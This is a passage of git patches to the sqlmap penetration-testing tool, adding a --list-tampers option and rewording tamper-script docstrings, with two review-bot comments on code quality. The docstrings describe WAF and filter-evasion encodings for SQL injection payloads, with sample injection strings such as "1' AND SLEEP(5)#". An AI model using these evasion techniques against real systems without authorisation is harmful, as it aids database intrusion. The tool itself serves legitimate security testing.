@@ -11,7 +11,7 @@ def tamper(payload, **kwargs): """ - Appends 'sp_password' to the end of the payload for automatic obfuscation from DBMS logs + Appends (MsSQL) function 'sp_password' to the end of the payload for automatic obfuscation from DBMS logs Requirement: * MSSQL diff --git a/tamper/space2plus.py b/tamper/space2plus.py index 1fa867490aa..d8ef65efdaf 100644 --- a/tamper/space2plus.py +++ b/tamper/space2plus.py @@ -17,8 +17,7 @@ def tamper(payload, **kwargs): Replaces space character (' ') with plus ('+') Notes: - * Is this any useful? The plus get's url-encoded by sqlmap engine - invalidating the query afterwards + * Is this any useful? The plus get's url-encoded by sqlmap engine invalidating the query afterwards * This tamper script works against all databases >>> tamper('SELECT id FROM users') diff --git a/tamper/unmagicquotes.py b/tamper/unmagicquotes.py index f26d0ac04bb..b6419e74d85 100644 --- a/tamper/unmagicquotes.py +++ b/tamper/unmagicquotes.py @@ -16,8 +16,7 @@ def dependencies(): def tamper(payload, **kwargs): """ - Replaces quote character (') with a multi-byte combo %bf%27 together with - generic comment at the end (to make it work) + Replaces quote character (') with a multi-byte combo %BF%27 together with generic comment at the end (to make it work) Notes: * Useful for bypassing magic_quotes/addslashes feature diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 1ae0fd4cf14..27f9d2297b4 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -48,7 +48,7 @@ c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -08a55a677bb2cd0da088110f81cf529b lib/core/settings.py +ec2adffae2982c11332c573fe4e68d6d lib/core/settings.py dd68a9d02fccb4fa1428b20e15b0db5d lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 12bed9603b6fba3e5ffda11d584bc449 lib/core/target.py 
@@ -228,43 +228,43 @@ ec2ba8c757ac96425dcd2b97970edd3a shell/stagers/stager.asp_
 4eaeef94314956e4517e5310a28d579a sqlmapapi.py
 a35b5b83c12841fdf3925190c9d24299 sqlmap.py
 523dab9e1093eb59264c6beb366b255a tamper/0x2char.py
-4c3b8a7daa4bff52e01d4168be0eedbe tamper/apostrophemask.py
-4115a55b8aba464723d645b7d3156b6e tamper/apostrophenullencode.py
-d7e9a979eff4d7315d804a181e66fc93 tamper/appendnullbyte.py
+4e6956958ef8135cd543d7a57f2e73ff tamper/apostrophemask.py
+7c838eadd96b20800ba0bd394f5014f0 tamper/apostrophenullencode.py
+0d7e8a3a0e17c92d51c49415884a47c9 tamper/appendnullbyte.py
 0298d81e9dfac7ff18a5236c0f1d84b6 tamper/base64encode.py
-9a3da4aa7b220448aa3ecbb92f68330f tamper/between.py
+e77a89b2af931a1820f6ba4b86d19cd4 tamper/between.py
 e1d2329adc6ca89828a2eaec2951806c tamper/bluecoat.py
-e3cdf13caedb4682bee3ff8fac103606 tamper/chardoubleencode.py
-3b2f68476fbcf8223199e8dd4ec14b64 tamper/charencode.py
-b502023ac6c48e49e652ba524b8e18cc tamper/charunicodeencode.py
-2c2b38974dc773568de7e7d771d7042c tamper/charunicodeescape.py
-6a395de07b60f47d9474ace0a98c160f tamper/commalesslimit.py
-211bb8fa36a6ecb42b719c951c362851 tamper/commalessmid.py
-6082358eb328d1cdd4587e73c95bbefc tamper/commentbeforeparentheses.py
-334e4a2485b3a1bbc1734823b93ea694 tamper/concat2concatws.py
-dcdc433fe946f1b9005bcd427a951dd6 tamper/equaltolike.py
-06df880df5d8749963f5562f60fd1637 tamper/escapequotes.py
+1807417f8a7fc0bb30c36ead458da0c8 tamper/chardoubleencode.py
+043c97c7b214335838a6bb15eeedcba3 tamper/charencode.py
+0c0d0e5d0caf4258a75112ab59fa3e75 tamper/charunicodeencode.py
+18b2ca09390686f895c3bbd6460ac034 tamper/charunicodeescape.py
+6c618b9310ed5c8de93c927e920b1d31 tamper/commalesslimit.py
+50f6532870d2e109bf46468e8d3ded49 tamper/commalessmid.py
+4951fec0a1af043e4b9c0728882d3452 tamper/commentbeforeparentheses.py
+376dc1203bfcd88380d902d36e7e0c5a tamper/concat2concatws.py
+6c882baf74213f401841968c04ce5e42 tamper/equaltolike.py
+22ab48f5b8ca449ac651637016be4369 tamper/escapequotes.py
 4393cc5220d2e39c5c9c5a9af4e2635d tamper/greatest.py
-25ec62158d3e289bda8a04c8b65686ba tamper/halfversionedmorekeywords.py
-9d8c350cbb90d4b21ec9c9db184a213a tamper/htmlencode.py
+6124bc647bfa04f2b16ff8cad98382d4 tamper/halfversionedmorekeywords.py
+ef0639557a79e57b06296c4bc223ebef tamper/htmlencode.py
 3f79551baf811ff70b2ba8795a2064be tamper/ifnull2casewhenisnull.py
 e2c2b6a67546b36983a72f129a817ec0 tamper/ifnull2ifisnull.py
-21665e68ef9f91b2395e81d2f341412d tamper/informationschemacomment.py
+4615cbeff722583e7ab3dbe774e38c93 tamper/informationschemacomment.py
 1e5532ede194ac9c083891c2f02bca93 tamper/__init__.py
 2dc49bcd6c55f4e2322b07fa92685356 tamper/least.py
 1834b5409c449d2ea1b70a5038fed9eb tamper/lowercase.py
-de4c83d33968a0cbf00cdfd8d35deddc tamper/modsecurityversioned.py
-39981d5d6cb84aca950458739102bb07 tamper/modsecurityzeroversioned.py
-5ee5147612ebe4769a67a8e2305d62f7 tamper/multiplespaces.py
-be757e4c9a6fb36af7b9a8c444fddb05 tamper/nonrecursivereplacement.py
-e298e486c06bb39d81f10d61a5c4ceec tamper/overlongutf8more.py
-b9f698556f8333d9fa6eadaab44a77ab tamper/overlongutf8.py
+1c4d622d1c2c77fc3db1f8b3849467ee tamper/modsecurityversioned.py
+f177a624c2cd3431c433769c6eb995e7 tamper/modsecurityzeroversioned.py
+91b63afdb96b1d51c12a14cbd425d310 tamper/multiplespaces.py
+efd1917c6ccc632f044084a30e0e0f98 tamper/nonrecursivereplacement.py
+95bf07047343c68a05658f5f11c6b413 tamper/overlongutf8more.py
+db4687249dedddbe057c8b163923ef01 tamper/overlongutf8.py
 bc0363e4fc04240c9f7b81e4ecce0714 tamper/percentage.py
-91272e566ceb4644254cd6abd613db21 tamper/plus2concat.py
-265314f4b3b921f4c0d470ddaa6506e4 tamper/plus2fnconcat.py
+db9cd6325d1814e5fe88323fe4add4e1 tamper/plus2concat.py
+bcad55e2f7ce3e58a4cc7fcef77d4a4a tamper/plus2fnconcat.py
 e94a1c7e4dc7450ac224436269d823bb tamper/randomcase.py
-6368a971a80b1acbbbc6b76616bd96b9 tamper/randomcomments.py
-48228322d40d97016b05e408c5234634 tamper/securesphere.py
+e50d9ed1c988638899cf82f18452e96c tamper/randomcomments.py
+938bfac6e55a8823e4a66cd29166d980 tamper/securesphere.py
 cac8a56f8cc6c14524ee392daa5ae2fd tamper/space2comment.py
 62d4d07b640d9d54d26ba33a77de9474 tamper/space2dash.py
 ab91c20f71973b1a9a5fecfb9f2a1d1f tamper/space2hash.py
@@ -274,12 +274,12 @@ ad45e799126d2d563b3958f714d2e7c6 tamper/space2mssqlblank.py
 74334d72bffb99b0ac092f87f4da2675 tamper/space2mssqlhash.py
 fd1bff6caefe5007444f7a0fabbc8ce9 tamper/space2mysqlblank.py
 48a1f013657186e336d249adefbdbc7b tamper/space2mysqldash.py
-36958b2a5f5915de8b7cc157a64b267a tamper/space2plus.py
+72a547bc3bf32dba0d1c3093988df8af tamper/space2plus.py
 6ce135f89259c379d84c85e538300091 tamper/space2randomblank.py
-95c91853034d9e276a6570e4d01b5f74 tamper/sp_password.py
+93fc10b57586936cef05e88227c84ad0 tamper/sp_password.py
 041cb567dff6bb6e7389e12ab3fb84c6 tamper/symboliclogical.py
 6459c62914ae643799667de8bd283c97 tamper/unionalltounion.py
-3b8182b8caef857b9af397e47d0c9938 tamper/unmagicquotes.py
+51d20b5cb5a50fc2e44d39087f865d23 tamper/unmagicquotes.py
 371afb396f0bb18d97147c5db83354f4 tamper/uppercase.py
 557ce5bf5ae9b7ab26f2c6b57312f41a tamper/varnish.py
 929a2586dbb7b758a454eb09e13e5a73 tamper/versionedkeywords.py
From 1f9bf587b523391bd27f48f17f5fd6babd0c5a93 Mon Sep 17 00:00:00 2001
From: Miroslav Stampar
Date: Tue, 31 Jul 2018 02:18:33 +0200
Subject: [PATCH 220/428] Implementation for an Issue #3108
---
 lib/core/common.py | 10 ++--
 lib/core/option.py | 18 +++++++
 lib/core/optiondict.py | 1 +
 lib/core/settings.py | 2 +-
 lib/parse/cmdline.py | 9 ++--
 sqlmap.conf | 4 ++
 tamper/apostrophemask.py | 2 +-
 tamper/apostrophenullencode.py | 2 +-
 tamper/appendnullbyte.py | 2 +-
 tamper/base64encode.py | 2 +-
 tamper/bluecoat.py | 3 +-
 tamper/chardoubleencode.py | 2 +-
 tamper/charencode.py | 2 +-
 tamper/charunicodeencode.py | 2 +-
 tamper/charunicodeescape.py | 2 +-
 tamper/ifnull2casewhenisnull.py | 2 +-
 tamper/ifnull2ifisnull.py | 2 +-
 tamper/informationschemacomment.py | 2 +-
 tamper/lowercase.py | 2 +-
 tamper/overlongutf8.py | 2 +-
 tamper/overlongutf8more.py | 2 +-
 tamper/percentage.py | 2 +-
 tamper/plus2concat.py | 2 +-
 tamper/plus2fnconcat.py | 2 +-
 tamper/randomcase.py | 2 +-
 tamper/randomcomments.py | 2 +-
 tamper/space2dash.py | 3 +-
 tamper/space2hash.py | 3 +-
 tamper/space2morecomment.py | 2 +-
 tamper/space2morehash.py | 3 +-
 tamper/space2mssqlblank.py | 3 +-
 tamper/space2mssqlhash.py | 3 +-
 tamper/space2mysqlblank.py | 3 +-
 tamper/space2mysqldash.py | 5 +-
 tamper/space2randomblank.py | 3 +-
 tamper/unionalltounion.py | 2 +-
 tamper/uppercase.py | 2 +-
 tamper/varnish.py | 8 +-
 tamper/versionedkeywords.py | 2 +-
 tamper/versionedmorekeywords.py | 2 +-
 tamper/xforwardedfor.py | 3 +-
 txt/checksum.md5 | 80 +++++++++++++++---------------
 42 files changed, 113 insertions(+), 99 deletions(-)
diff --git a/lib/core/common.py b/lib/core/common.py
index 8920ca854bc..885cdaac53d 100644
--- a/lib/core/common.py
+++ b/lib/core/common.py
@@ -868,11 +868,11 @@ def boldifyMessage(message): retVal = message if any(_ in message for _ in BOLD_PATTERNS): - retVal = setColor(message, True) + retVal = setColor(message, bold=True) return retVal -def setColor(message, bold=False): +def setColor(message, color=None, bold=False): retVal = message level = extractRegexResult(r"\[(?P%s)\]" % '|'.join(_[0] for _ in getPublicTypeMembers(LOGGING_LEVELS)), message) or kb.get("stickyLevel") @@ -880,8 +880,8 @@ def setColor(message, bold=False): level = unicodeencode(level) if message and getattr(LOGGER_HANDLER, "is_tty", False): # colorizing handler - if bold: - retVal = colored(message, color=None, on_color=None, attrs=("bold",)) + if bold or color: + retVal = colored(message, color=color, on_color=None, attrs=("bold",) if bold else None) elif level: level = getattr(logging, level, None) if isinstance(level, basestring) else level retVal = LOGGER_HANDLER.colorize(message, level) @@ -925,7 +925,7 @@ def dataToStdout(data, forceOutput=False, bold=False, content_type=None, status= if conf.get("api"): sys.stdout.write(message, status, content_type) else: - sys.stdout.write(setColor(message, bold)) + sys.stdout.write(setColor(message, bold=bold)) sys.stdout.flush() except IOError: diff --git a/lib/core/option.py b/lib/core/option.py index ee2d64112f7..502a7910117 100644 --- a/lib/core/option.py +++ b/lib/core/option.py @@ -54,6 +54,7 @@ from lib.core.common import runningAsAdmin from lib.core.common import safeExpandUser from lib.core.common import saveConfig +from lib.core.common import setColor from lib.core.common import setOptimize from lib.core.common import setPaths from lib.core.common import singleTimeWarnMessage 
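Review bot: `def setColor(message, color=None, bold=False):` inserts the new parameter ahead of `bold`, so a caller that still passes the flag positionally — exactly what `boldifyMessage` and `dataToStdout` did before this commit — now hands `True` to `color` and reaches `colored(message, color=True, ...)` in the second hunk instead of the bold branch. The two call sites in this diff are converted to keyword form, but any other positional caller lives outside the hunk and is not visible here. Appending the parameter instead, `def setColor(message, bold=False, color=None):`, keeps the old positional contract and still lets the new `setColor(name, color="yellow")` style work. The body of setColor continues past the end of the first hunk.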
@@ -699,6 +700,22 @@ def _setDBMS(): break +def _listTamperingFunctions(): + """ + Lists available tamper functions + """ + + if conf.listTampers: + infoMsg = "listing available tamper scripts\n" + logger.info(infoMsg) + + for script in sorted(glob.glob(os.path.join(paths.SQLMAP_TAMPER_PATH, "*.py"))): + content = openFile(script, "rb").read() + match = re.search(r'(?s)__priority__.+"""(.+)"""', content) + if match: + comment = match.group(1).strip() + dataToStdout("* %s - %s\n" % (setColor(os.path.basename(script), "yellow"), re.sub(r" *\n *", " ", comment.split("\n\n")[0].strip()))) + def _setTamperingFunctions(): """ Loads tampering functions from given script(s) @@ -2459,6 +2476,7 @@ def init(): _setDNSServer() _adjustLoggingFormatter() _setMultipleTargets() + _listTamperingFunctions() _setTamperingFunctions() _setWafFunctions() _setTrafficOutputFP() diff --git a/lib/core/optiondict.py b/lib/core/optiondict.py index e8c25ac627e..10c5b2c8e73 100644 --- a/lib/core/optiondict.py +++ b/lib/core/optiondict.py @@ -227,6 +227,7 @@ "disableColoring": "boolean", "googlePage": "integer", "identifyWaf": "boolean", + "listTampers": "boolean", "mobile": "boolean", "offline": "boolean", "purge": "boolean", diff --git a/lib/core/settings.py b/lib/core/settings.py index 85c54fbc2ad..93ae43a1f30 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.7.27" +VERSION = "1.2.7.28" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/lib/parse/cmdline.py b/lib/parse/cmdline.py index ab2fbe8ebb8..b255b9da138 100644 --- a/lib/parse/cmdline.py +++ b/lib/parse/cmdline.py 
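Review bot: `content = openFile(script, "rb").read()` in the new `_listTamperingFunctions` never closes the file object, leaving it to garbage collection on every iteration of the loop; `with openFile(script, "rb") as f: content = f.read()` closes it deterministically, assuming `openFile` returns a context-manager file object as its name suggests — confirm against its definition. The lookup `re.search(r'(?s)__priority__.+"""(.+)"""', content)` is greedy on both `.+`, so it captures whatever lies between the last two `"""` after `__priority__`, not the first docstring; that is correct only while each tamper script has exactly one triple-quoted string after `__priority__`, so a comment stating that assumption (or the non-greedy `.+?` on both sides) would make the dependency explicit. Nothing in the hunk stops execution after the listing, and `init()` goes on to `_setTamperingFunctions()` on the next line; whether `--list-tampers` is meant to return early depends on code outside this hunk.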
@@ -637,6 +637,9 @@ def cmdLineParser(argv=None): miscellaneous.add_option("--identify-waf", dest="identifyWaf", action="store_true", help="Make a thorough testing for a WAF/IPS/IDS protection") + miscellaneous.add_option("--list-tampers", dest="listTampers", action="store_true", + help="Display list of available tamper scripts") + miscellaneous.add_option("--mobile", dest="mobile", action="store_true", help="Imitate smartphone through HTTP User-Agent header") @@ -874,9 +877,9 @@ def _(self, *args): if args.dummy: args.url = args.url or DUMMY_URL - if not any((args.direct, args.url, args.logFile, args.bulkFile, args.googleDork, args.configFile, args.requestFile, args.updateAll, args.smokeTest, args.liveTest, args.wizard, args.dependencies, args.purge, args.sitemapUrl)): - errMsg = "missing a mandatory option (-d, -u, -l, -m, -r, -g, -c, -x, --wizard, --update, --purge or --dependencies), " - errMsg += "use -h for basic or -hh for advanced help\n" + if not any((args.direct, args.url, args.logFile, args.bulkFile, args.googleDork, args.configFile, args.requestFile, args.updateAll, args.smokeTest, args.liveTest, args.wizard, args.dependencies, args.purge, args.sitemapUrl, args.listTampers)): + errMsg = "missing a mandatory option (-d, -u, -l, -m, -r, -g, -c, -x, --list-tampers, --wizard, --update, --purge or --dependencies). " + errMsg += "Use -h for basic and -hh for advanced help\n" parser.error(errMsg) return args diff --git a/sqlmap.conf b/sqlmap.conf index 3d70d3383d0..962651c57ff 100644 --- a/sqlmap.conf +++ b/sqlmap.conf @@ -778,6 +778,10 @@ googlePage = 1 # Valid: True or False identifyWaf = False +# Display list of available tamper scripts +# Valid: True or False +listTampers = False + # Imitate smartphone through HTTP User-Agent header. # Valid: True or False mobile = False diff --git a/tamper/apostrophemask.py b/tamper/apostrophemask.py index cc01e3f7131..231617ad64b 100644 --- a/tamper/apostrophemask.py +++ b/tamper/apostrophemask.py 
@@ -14,7 +14,7 @@ def dependencies(): def tamper(payload, **kwargs): """ - Replaces apostrophe character (') with its UTF-8 full width counterpart + Replaces apostrophe character (') with its UTF-8 full width counterpart (e.g. ' -> %EF%BC%87) References: * http://www.utf8-chartable.de/unicode-utf8-table.pl?start=65280&number=128 diff --git a/tamper/apostrophenullencode.py b/tamper/apostrophenullencode.py index a984d26d3cb..54fe9c80207 100644 --- a/tamper/apostrophenullencode.py +++ b/tamper/apostrophenullencode.py @@ -14,7 +14,7 @@ def dependencies(): def tamper(payload, **kwargs): """ - Replaces apostrophe character (') with its illegal double unicode counterpart + Replaces apostrophe character (') with its illegal double unicode counterpart (e.g. ' -> %00%27) >>> tamper("1 AND '1'='1") '1 AND %00%271%00%27=%00%271' diff --git a/tamper/appendnullbyte.py b/tamper/appendnullbyte.py index 662b5785745..1eaca164f1c 100644 --- a/tamper/appendnullbyte.py +++ b/tamper/appendnullbyte.py @@ -18,7 +18,7 @@ def dependencies(): def tamper(payload, **kwargs): """ - Appends encoded NULL byte character (%00) at the end of payload + Appends (Access) NULL byte character (%00) at the end of payload Requirement: * Microsoft Access diff --git a/tamper/base64encode.py b/tamper/base64encode.py index d2057778b23..21ae80233fb 100644 --- a/tamper/base64encode.py +++ b/tamper/base64encode.py @@ -17,7 +17,7 @@ def dependencies(): def tamper(payload, **kwargs): """ - Base64 all characters in a given payload + Base64-encodes all characters in a given payload >>> tamper("1' AND SLEEP(5)#") 'MScgQU5EIFNMRUVQKDUpIw==' diff --git a/tamper/bluecoat.py b/tamper/bluecoat.py index f0f034f39a4..5b17c0db66f 100644 --- a/tamper/bluecoat.py +++ b/tamper/bluecoat.py 
@@ -17,8 +17,7 @@ def dependencies(): def tamper(payload, **kwargs): """ - Replaces space character after SQL statement with a valid random blank character. - Afterwards replace character '=' with operator LIKE + Replaces space character after SQL statement with a valid random blank character. Afterwards replace character '=' with operator LIKE Requirement: * Blue Coat SGOS with WAF activated as documented in diff --git a/tamper/chardoubleencode.py b/tamper/chardoubleencode.py index 19a50bf5c7c..b1d0f8fe2b4 100644 --- a/tamper/chardoubleencode.py +++ b/tamper/chardoubleencode.py @@ -16,7 +16,7 @@ def dependencies(): def tamper(payload, **kwargs): """ - Double URL-encodes all characters in a given payload (not processing already encoded) + Double URL-encodes all characters in a given payload (not processing already encoded) (e.g. SELECT -> %2553%2545%254C%2545%2543%2554) Notes: * Useful to bypass some weak web application firewalls that do not double URL-decode the request before processing it through their ruleset diff --git a/tamper/charencode.py b/tamper/charencode.py index 37f5ff31c0a..324c4a90d8a 100644 --- a/tamper/charencode.py +++ b/tamper/charencode.py @@ -16,7 +16,7 @@ def dependencies(): def tamper(payload, **kwargs): """ - URL-encodes all characters in a given payload (not processing already encoded) + URL-encodes all characters in a given payload (not processing already encoded) (e.g. SELECT -> %53%45%4C%45%43%54) Tested against: * Microsoft SQL Server 2005 diff --git a/tamper/charunicodeencode.py b/tamper/charunicodeencode.py index 0c07a31fc39..dc1a5dca3b1 100644 --- a/tamper/charunicodeencode.py +++ b/tamper/charunicodeencode.py @@ -18,7 +18,7 @@ def dependencies(): def tamper(payload, **kwargs): """ - Unicode-URL-encodes all characters in a given payload (not processing already encoded) + Unicode-URL-encodes all characters in a given payload (not processing already encoded) (e.g. SELECT -> %u0053%u0045%u004C%u0045%u0043%u0054) Requirement: * ASP 
diff --git a/tamper/charunicodeescape.py b/tamper/charunicodeescape.py index 380f0736b6f..28984164db6 100644 --- a/tamper/charunicodeescape.py +++ b/tamper/charunicodeescape.py @@ -13,7 +13,7 @@ def tamper(payload, **kwargs): """ - Unicode-escapes non-encoded characters in a given payload (not processing already encoded) + Unicode-escapes non-encoded characters in a given payload (not processing already encoded) (e.g. SELECT -> \u0053\u0045\u004C\u0045\u0043\u0054) Notes: * Useful to bypass weak filtering and/or WAFs in JSON contexes diff --git a/tamper/ifnull2casewhenisnull.py b/tamper/ifnull2casewhenisnull.py index b049d858271..c9a8c0ee2fa 100644 --- a/tamper/ifnull2casewhenisnull.py +++ b/tamper/ifnull2casewhenisnull.py @@ -14,7 +14,7 @@ def dependencies(): def tamper(payload, **kwargs): """ - Replaces instances like 'IFNULL(A, B)' with 'CASE WHEN ISNULL(A) THEN (B) ELSE (A) END' + Replaces instances like 'IFNULL(A, B)' with 'CASE WHEN ISNULL(A) THEN (B) ELSE (A) END' counterpart Requirement: * MySQL diff --git a/tamper/ifnull2ifisnull.py b/tamper/ifnull2ifisnull.py index 956629296ca..9e2531941fd 100644 --- a/tamper/ifnull2ifisnull.py +++ b/tamper/ifnull2ifisnull.py @@ -14,7 +14,7 @@ def dependencies(): def tamper(payload, **kwargs): """ - Replaces instances like 'IFNULL(A, B)' with 'IF(ISNULL(A), B, A)' + Replaces instances like 'IFNULL(A, B)' with 'IF(ISNULL(A), B, A)' counterpart Requirement: * MySQL diff --git a/tamper/informationschemacomment.py b/tamper/informationschemacomment.py index 63a2d9aa269..24fcc7b9b9e 100644 --- a/tamper/informationschemacomment.py +++ b/tamper/informationschemacomment.py @@ -13,7 +13,7 @@ def tamper(payload, **kwargs): """ - Add a comment to the end of all occurrences of (MySQL) "information_schema" identifier + Add an inline comment (/**/) to the end of all occurrences of (MySQL) "information_schema" identifier >>> tamper('SELECT table_name FROM INFORMATION_SCHEMA.TABLES') 'SELECT table_name FROM INFORMATION_SCHEMA/**/.TABLES' 
diff --git a/tamper/lowercase.py b/tamper/lowercase.py index 0723edbdd8e..51a86e33563 100644 --- a/tamper/lowercase.py +++ b/tamper/lowercase.py @@ -17,7 +17,7 @@ def dependencies(): def tamper(payload, **kwargs): """ - Replaces each keyword character with lower case value + Replaces each keyword character with lower case value (e.g. SELECT -> select) Tested against: * Microsoft SQL Server 2005 diff --git a/tamper/overlongutf8.py b/tamper/overlongutf8.py index c5321317477..3e434638328 100644 --- a/tamper/overlongutf8.py +++ b/tamper/overlongutf8.py @@ -16,7 +16,7 @@ def dependencies(): def tamper(payload, **kwargs): """ - Converts all (non-alphanum) characters in a given payload (not processing already encoded) + Converts all (non-alphanum) characters in a given payload to overlong UTF8 (not processing already encoded) (e.g. ' -> %C0%A7) Reference: * https://www.acunetix.com/vulnerabilities/unicode-transformation-issues/ diff --git a/tamper/overlongutf8more.py b/tamper/overlongutf8more.py index 2a9ee4c14d4..a34b61929cb 100644 --- a/tamper/overlongutf8more.py +++ b/tamper/overlongutf8more.py @@ -16,7 +16,7 @@ def dependencies(): def tamper(payload, **kwargs): """ - Converts all characters in a given payload (not processing already encoded) + Converts all characters in a given payload to overlong UTF8 (not processing already encoded) (e.g. SELECT -> %C1%93%C1%85%C1%8C%C1%85%C1%83%C1%94) Reference: * https://www.acunetix.com/vulnerabilities/unicode-transformation-issues/ diff --git a/tamper/percentage.py b/tamper/percentage.py index 0a32661e588..182ddc52c33 100644 --- a/tamper/percentage.py +++ b/tamper/percentage.py @@ -18,7 +18,7 @@ def dependencies(): def tamper(payload, **kwargs): """ - Adds a percentage sign ('%') infront of each character + Adds a percentage sign ('%') infront of each character (e.g. SELECT -> %S%E%L%E%C%T) Requirement: * ASP diff --git a/tamper/plus2concat.py b/tamper/plus2concat.py index fa238ae9179..574a2082850 100644 
--- a/tamper/plus2concat.py +++ b/tamper/plus2concat.py @@ -20,7 +20,7 @@ def dependencies(): def tamper(payload, **kwargs): """ - Replaces plus operator ('+') with (MsSQL) function CONCAT() + Replaces plus operator ('+') with (MsSQL) function CONCAT() counterpart Tested against: * Microsoft SQL Server 2012 diff --git a/tamper/plus2fnconcat.py b/tamper/plus2fnconcat.py index 273dd6462a0..86ceee621ca 100644 --- a/tamper/plus2fnconcat.py +++ b/tamper/plus2fnconcat.py @@ -20,7 +20,7 @@ def dependencies(): def tamper(payload, **kwargs): """ - Replaces plus operator ('+') with (MsSQL) ODBC function {fn CONCAT()} + Replaces plus operator ('+') with (MsSQL) ODBC function {fn CONCAT()} counterpart Tested against: * Microsoft SQL Server 2008 diff --git a/tamper/randomcase.py b/tamper/randomcase.py index a5fcaf97016..9d2843154e3 100644 --- a/tamper/randomcase.py +++ b/tamper/randomcase.py @@ -18,7 +18,7 @@ def dependencies(): def tamper(payload, **kwargs): """ - Replaces each keyword character with random case value + Replaces each keyword character with random case value (e.g. SELECT -> SEleCt) Tested against: * Microsoft SQL Server 2005 diff --git a/tamper/randomcomments.py b/tamper/randomcomments.py index 7004134231a..9890deed3db 100644 --- a/tamper/randomcomments.py +++ b/tamper/randomcomments.py @@ -15,7 +15,7 @@ def tamper(payload, **kwargs): """ - Add random inline comments inside SQL keywords + Add random inline comments inside SQL keywords (e.g. SELECT -> S/**/E/**/LECT) >>> import random >>> random.seed(0) diff --git a/tamper/space2dash.py b/tamper/space2dash.py index 94cfc8d24b2..525e051a268 100644 --- a/tamper/space2dash.py +++ b/tamper/space2dash.py @@ -14,8 +14,7 @@ def tamper(payload, **kwargs): """ - Replaces space character (' ') with a dash comment ('--') followed by - a random string and a new line ('\n') + Replaces space character (' ') with a dash comment ('--') followed by a random string and a new line ('\n') Requirement: * MSSQL 
diff --git a/tamper/space2hash.py b/tamper/space2hash.py index c21e3f04130..56d5e06e5eb 100644 --- a/tamper/space2hash.py +++ b/tamper/space2hash.py @@ -20,8 +20,7 @@ def dependencies(): def tamper(payload, **kwargs): """ - Replaces space character (' ') with a pound character ('#') followed by - a random string and a new line ('\n') + Replaces (MySQL) instances of space character (' ') with a pound character ('#') followed by a random string and a new line ('\n') Requirement: * MySQL diff --git a/tamper/space2morecomment.py b/tamper/space2morecomment.py index 0fa476d5973..e3644b6d956 100644 --- a/tamper/space2morecomment.py +++ b/tamper/space2morecomment.py @@ -14,7 +14,7 @@ def dependencies(): def tamper(payload, **kwargs): """ - Replaces space character (' ') with comments '/**_**/' + Replaces (MySQL) instances of space character (' ') with comments '/**_**/' Tested against: * MySQL 5.0 and 5.5 diff --git a/tamper/space2morehash.py b/tamper/space2morehash.py index aa5df6f1a5f..77169fb96d9 100644 --- a/tamper/space2morehash.py +++ b/tamper/space2morehash.py @@ -23,8 +23,7 @@ def dependencies(): def tamper(payload, **kwargs): """ - Replaces space character (' ') with a pound character ('#') followed by - a random string and a new line ('\n') + Replaces (MySQL) instances of space character (' ') with a pound character ('#') followed by a random string and a new line ('\n') Requirement: * MySQL >= 5.1.13 diff --git a/tamper/space2mssqlblank.py b/tamper/space2mssqlblank.py index 8a1ba82a4d9..8424ec1ca71 100644 --- a/tamper/space2mssqlblank.py +++ b/tamper/space2mssqlblank.py @@ -19,8 +19,7 @@ def dependencies(): def tamper(payload, **kwargs): """ - Replaces space character (' ') with a random blank character from a - valid set of alternate characters + Replaces (MsSQL) instances of space character (' ') with a random blank character from a valid set of alternate characters Requirement: * Microsoft SQL Server 
diff --git a/tamper/space2mssqlhash.py b/tamper/space2mssqlhash.py index e50a560c69a..0e489c8f2ff 100644 --- a/tamper/space2mssqlhash.py +++ b/tamper/space2mssqlhash.py @@ -11,8 +11,7 @@ def tamper(payload, **kwargs): """ - Replaces space character (' ') with a pound character ('#') followed by - a new line ('\n') + Replaces space character (' ') with a pound character ('#') followed by a new line ('\n') Requirement: * MSSQL diff --git a/tamper/space2mysqlblank.py b/tamper/space2mysqlblank.py index ed024252994..0216e2d6ed5 100644 --- a/tamper/space2mysqlblank.py +++ b/tamper/space2mysqlblank.py @@ -19,8 +19,7 @@ def dependencies(): def tamper(payload, **kwargs): """ - Replaces space character (' ') with a random blank character from a - valid set of alternate characters + Replaces (MySQL) instances of space character (' ') with a random blank character from a valid set of alternate characters Requirement: * MySQL diff --git a/tamper/space2mysqldash.py b/tamper/space2mysqldash.py index f351079028c..67e72538b47 100644 --- a/tamper/space2mysqldash.py +++ b/tamper/space2mysqldash.py @@ -18,15 +18,12 @@ def dependencies(): def tamper(payload, **kwargs): """ - Replaces space character (' ') with a dash comment ('--') followed by - a new line ('\n') + Replaces space character (' ') with a dash comment ('--') followed by a new line ('\n') Requirement: * MySQL * MSSQL - Tested against: - Notes: * Useful to bypass several web application firewalls. diff --git a/tamper/space2randomblank.py b/tamper/space2randomblank.py index c61a3a3f4dc..0234b65caed 100644 --- a/tamper/space2randomblank.py +++ b/tamper/space2randomblank.py @@ -16,8 +16,7 @@ def dependencies(): def tamper(payload, **kwargs): """ - Replaces space character (' ') with a random blank character from a - valid set of alternate characters + Replaces space character (' ') with a random blank character from a valid set of alternate characters Tested against: * Microsoft SQL Server 2005 
